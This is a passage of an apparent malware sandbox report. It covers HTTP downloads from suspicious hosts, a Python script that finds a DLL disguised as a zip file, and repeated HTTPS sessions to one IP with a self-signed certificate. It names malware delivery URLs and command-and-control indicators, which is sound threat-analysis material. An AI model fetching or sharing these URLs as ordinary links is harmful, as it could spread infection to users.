User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: sendgrid.invoteqleads.com
Connection: Keep-Alive
Jan 13, 2021 16:39:07.640290976 CET | 647 | IN | HTTP/1.1 200 OK
Date: Wed, 13 Jan 2021 15:39:07 GMT
Content-Type: application/x-rar-compressed
Content-Length: 0
Connection: keep-alive
Set-Cookie: __cfduid=d24425c38282fae9d3f801a2e53842d3c1610552347; expires=Fri, 12-Feb-21 15:39:07 GMT; path=/; domain=.invoteqleads.com; HttpOnly; SameSite=Lax
Last-Modified: Wed, 13 Jan 2021 14:10:37 GMT
ETag: "12e0df-0-5b8c8b40b6d3f"
X-Varnish: 2961376 3517331
Age: 355
X-Cache: HIT
X-Cache-Hits: 7
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 079dffa34f000041133a068000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=n1rJ9YTU0d9eSY9JLS%2BXwjb2%2F5qhOW1FvUI3PooamsyDlI20E3agtpgRo7HjEJ5tOjAlw3H55wt2oQprArKGfnEgW8GGlmZR50mT8EZEaJBUfVXhKbmrdJS4"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6110354bbddc4113-PRG
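What the three sessions above actually delivered is easier to see in code than in the hex. The following is an added example (not part of the sandbox report and not Joe Sandbox tooling) that transcribes the leading bytes of the two response bodies from the Data Raw dumps printed above, together with the printed response headers, and asks the questions a triage analyst asks: does the body match its declared Content-Type, is it still wrapped in a transfer or content encoding, and if it is a PE, what kind? The function names, the verdict labels and the "empty"/"unknown" classes are this example's own; the bodies are as truncated as the report's dumps, which is exactly the situation the parser has to cope with.

```python
"""Triage of the three HTTP downloads in the report's "HTTP Packets" section.

Added example, not part of the sandbox report.  SESSION0_BODY and SESSION1_BODY
are the leading bytes of the two response bodies, transcribed from the page's
"Data Raw" dumps (the report truncates them, so the bodies are incomplete here
too); header values come from the printed responses.  Function names, verdict
labels and the 'empty'/'unknown' classes are this example's own.
"""
import struct
from datetime import datetime, timezone

# Session 0, GET /lpxtpiw.zip: first 0x9c bytes of a body served as application/zip.
# Offsets 0x1c-0x3b (reserved DOS-header fields) are all zero in the dump.
SESSION0_BODY = (
    bytes.fromhex("4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 "
                  "b8 00 00 00 00 00 00 00 40 00 00 00")
    + bytes(32)
    + bytes.fromhex("80 00 00 00")                            # e_lfanew = 0x80
    + bytes.fromhex("0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21")
    + b"This program cannot be run in DOS mode.\r\r\n$" + bytes(7)
    + bytes.fromhex("50 45 00 00 4c 01 09 00 f6 fb fe 5f 00 00 00 00 "
                    "00 00 00 00 e0 00 0e 21 0b 01 02 32")
)
# Session 1, GET /dyu828kp.rar: chunked, Content-Encoding gzip; first 24 bytes.
SESSION1_BODY = bytes.fromhex(
    "31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 09 58 53 c7 fb 3f")

SESSIONS = [
    {"url": "http://bipolarmalta.mccarthy.ws/lpxtpiw.zip",
     "headers": {"Content-Type": "application/zip", "Content-Length": "303616"},
     "body": SESSION0_BODY},
    {"url": "http://oudtshoornpharmacies.co.za/dyu828kp.rar",
     "headers": {"Content-Type": "application/x-rar-compressed",
                 "Content-Encoding": "gzip", "Transfer-Encoding": "chunked"},
     "body": SESSION1_BODY},
    {"url": "http://sendgrid.invoteqleads.com/usc3d1.rar",
     "headers": {"Content-Type": "application/x-rar-compressed", "Content-Length": "0"},
     "body": b""},
]

MAGICS = [(b"MZ", "pe"), (b"\x1f\x8b\x08", "gzip"),
          (b"PK\x03\x04", "zip"), (b"Rar!\x1a\x07", "rar")]
IMAGE_FILE_DLL = 0x2000
MACHINES = {0x14C: "i386", 0x8664: "x86-64"}


def sniff_magic(data):
    """Classify a body by its leading bytes, ignoring what the server claimed."""
    if not data:
        return "empty"
    for magic, name in MAGICS:
        if data.startswith(magic):
            return name
    return "unknown"


def dechunk(body):
    """Undo chunked transfer-encoding on a possibly truncated capture.
    Returns (payload, complete); complete is False when the data stops before
    the terminating zero-length chunk, as the page's dump does."""
    out, pos = bytearray(), 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            return bytes(out), False
        size = int(body[pos:end].split(b";")[0], 16)   # drop chunk extensions
        if size == 0:
            return bytes(out), True
        chunk = body[end + 2:end + 2 + size]
        out += chunk
        if len(chunk) < size:                           # capture ends mid-chunk
            return bytes(out), False
        pos = end + 2 + size + 2                        # step over chunk + CRLF


def parse_pe_coff(data):
    """Read the DOS header, COFF file header and optional-header magic.
    Needs only the first e_lfanew + 28 bytes, so a truncated body is enough."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if len(data) < e_lfanew + 28 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsec, ts, _symtab, _nsyms, _optsize, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt_magic, lnk_major, lnk_minor = struct.unpack_from("<HBB", data, e_lfanew + 24)
    built = datetime.fromtimestamp(ts, tz=timezone.utc)
    return {"machine": MACHINES.get(machine, hex(machine)), "sections": nsec,
            "timestamp": ts, "compiled_utc": built.strftime("%Y-%m-%d %H:%M:%S"),
            "characteristics": chars, "is_dll": bool(chars & IMAGE_FILE_DLL),
            "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(opt_magic, hex(opt_magic)),
            "linker": f"{lnk_major}.{lnk_minor:02d}"}


def triage(session):
    """Compare the declared Content-Type with what actually arrived."""
    headers, body = session["headers"], session["body"]
    if "chunked" in headers.get("Transfer-Encoding", ""):
        body, _complete = dechunk(body)
    declared = headers.get("Content-Type", "")
    encoding = headers.get("Content-Encoding", "identity")
    seen = sniff_magic(body)
    verdict = {"url": session["url"], "declared": declared, "sniffed": seen}
    if seen == "empty":
        verdict["mismatch"] = False
        verdict["note"] = "empty body, nothing to analyse"
    elif seen == "gzip" and encoding == "gzip":
        # Still inside the transport encoding: magic bytes cannot judge the
        # payload until the stream is inflated.
        verdict["mismatch"] = None
        verdict["note"] = "inflate the gzip stream before judging the payload"
    else:
        verdict["mismatch"] = seen not in declared
        if seen == "pe":
            verdict["pe"] = parse_pe_coff(body)
    return verdict


def triage_all():
    return [triage(s) for s in SESSIONS]


if __name__ == "__main__":
    print(*triage_all(), sep="\n")
```

Run stand-alone it reports that /lpxtpiw.zip, served as application/zip, begins with a 32-bit PE whose Characteristics (0x210e) carry the DLL bit, nine sections, linker version 2.50 and a build timestamp of 2021-01-13 13:56:06 UTC, the day of the analysis and under two hours before the server's Date header; the server's Last-Modified of 18 Dec 2020 predates that timestamp, so at least one of the two values is not what it claims. /dyu828kp.rar arrives chunked and gzip-encoded, so its first bytes are a gzip header and say nothing yet about the RAR claim; /usc3d1.rar came back with Content-Length: 0. The compile timestamp is a header field the builder writes and can forge, so treat it as a hint about the build pipeline rather than proof.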


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jan 13, 2021 16:39:05.193562984 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49167 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:09.162190914 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49170 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:13.268611908 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49175 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:14.891390085 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49176 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:18.261352062 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49181 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:19.909943104 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49182 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:23.452966928 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49187 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:26.484675884 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49188 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:30.368347883 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49193 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:31.476021051 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49194 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:35.353327036 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49199 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:36.496928930 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49200 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:40.366308928 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49205 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:41.540806055 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49206 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:47.274188995 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49211 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:49.940793991 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49212 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:52.826827049 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49217 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:54.904294968 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49218 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:57.763037920 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49223 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:39:59.878298998 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49225 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:40:02.732959986 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49229 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:40:05.009872913 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49230 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:40:08.074237108 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49235 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
Jan 13, 2021 16:40:09.964689016 CET | 221.126.244.72 | 443 | 192.168.2.22 | 49236 | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ER | Sun Jan 10 12:10:00 CET 2021 | Sun Jul 11 13:10:00 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0 | eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:13.046384096 CET221.126.244.72443192.168.2.2249241CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:14.987751961 CET221.126.244.72443192.168.2.2249242CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:18.032439947 CET221.126.244.72443192.168.2.2249247CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:19.984910011 CET221.126.244.72443192.168.2.2249248CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:23.045615911 CET221.126.244.72443192.168.2.2249253CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:24.944977045 CET221.126.244.72443192.168.2.2249254CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:28.012180090 CET221.126.244.72443192.168.2.2249259CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:29.930995941 CET221.126.244.72443192.168.2.2249260CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:33.000884056 CET221.126.244.72443192.168.2.2249265CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:34.938282013 CET221.126.244.72443192.168.2.2249266CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:38.001213074 CET221.126.244.72443192.168.2.2249271CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:39.933769941 CET221.126.244.72443192.168.2.2249272CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
